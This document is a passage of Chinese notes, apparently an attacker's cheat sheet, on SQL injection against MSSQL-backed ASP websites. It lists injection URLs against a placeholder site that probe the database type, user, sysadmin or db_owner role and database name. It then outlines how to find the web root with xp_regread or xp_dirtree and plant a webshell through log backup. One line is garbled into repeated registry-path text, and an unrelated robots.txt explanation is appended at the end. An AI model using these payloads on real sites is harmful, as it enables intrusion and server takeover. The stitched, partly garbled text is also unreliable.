- 首先检测下MSSQL数据库的用户权限,一般有两种,一种是SA权限,这种权限很大,还有一种是DB_OWNER权限,这个权限赋给用户一些对数据库的修改、删除、新增数据库表,执行部分存储过程的权限。但是涉及到一些系统敏感操作权限不具备。
- 判断数据库类型:http:www.xx.com/detail.asp?id=1' and (select count(*) from msysobjects) > 0 --;
- 接着刺探数据库用户名:http://www.xx.com/detail.asp?id=1' and user>0 --;
- 然后是数据库角色:http://www.xx.com/detail.asp?id=1' and 1=(select IS_SRVROLEMEMBER('sysadmin')); --,返回错误,说明不是SA;如果http://www.xx.com/detail.asp?id=1’ and 1=(select IS_MEMBER('db_owner')); --,返回正常,说明是db_owner权限。
- 数据库名:http://www.xx.com/detail.asp?id=1' and db_name()>0 --;
- db_owner是我们常用的方法是读网站目录,然后备份获取shell,很多朋友依然用database差异备份的方法,这个方法有个缺点,那就是获得的shell太大。下面演示log备份获得webshell,它取得的webshell一般只有20-70kB左右,NBSI3中已经加入了这个方法:http://book.2cto.com/201506/52027.html
- 下面找网站的目录,有两种方法:一种是xp_regread读注册表中HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtual Roots项;第二种是xp_dirtree列目录,可以通过工具;
- http://blog.163.com/lang_zhu/blog/static/8329405220084233174509/ 详情见此网站;_hLOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtual RootsHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtual Roots
- http://blog.163.com/jswinter@yeah/blog/static/67502270201043181624609/
robots.txt是网站管理创建的一个txt文件,告诉搜索引起哪些文件需要被爬取、哪些文件不希望被爬取。搜索引擎的spider的大致过程为首先请求一个页面,然后分析这个页面,查找该页面链接到其他内容的链接,然后请求,如此循环。